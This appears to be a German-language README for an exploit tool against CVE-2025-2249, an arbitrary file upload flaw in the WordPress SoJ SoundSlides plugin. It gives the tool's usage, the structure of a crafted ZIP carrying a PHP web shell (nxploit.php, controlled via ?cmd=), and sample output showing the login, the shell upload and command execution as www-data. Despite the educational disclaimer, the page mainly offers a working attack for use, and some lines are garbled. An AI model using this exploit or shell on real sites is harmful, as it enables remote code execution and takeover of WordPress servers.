
WordPress SoJ SoundSlides Plugin <= 1.2.2 ist anfällig für beliebigen Datei-Upload.
⚠️ HAFTUNGSAUSSCHLUSS: Dieser Exploit dient ausschließlich zu Bildungs- und autorisierten Testzwecken.
Das SoJ SoundSlides-Plugin erlaubt authentifizierten Benutzern mit der Rolle Contributor oder höher, beliebige ZIP-Dateien hochzuladen. Aufgrund fehlender Validierung können Angreifer PHP-Webshells hochladen, die aus einem über das Web erreichbaren Verzeichnis extrahiert und ausgeführt werden.
Ein Angreifer mit gültigen WordPress-Zugangsdaten kann:
?cmd=)usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,
options:
-h, --help show this help message and exit
-u, --url URL WordPress base URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
| Argument | Beschreibung |
|---|---|
-u | WordPress-Basis-URL |
-un | WordPress-Benutzername |
-p | WordPress-Passwort |
readme.txtnxploit/
├── index.html
├── data/
│ └── data.xml
├── audio/
│ └── audio.mp3
└── nxploit.php ← PHP shell (?cmd=)
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data
wp-content/uploads/ auf unerwartete .php-DateienMit ❤️ erstellt von [Nxploited | Khaled ALenazi]
Für Bildung, Sensibilisierung und Verteidigung.
Sicherheit ist die Verantwortung eines jeden. Testen Sie immer ethisch, melden Sie verantwortungsvoll und schützen Sie das Web.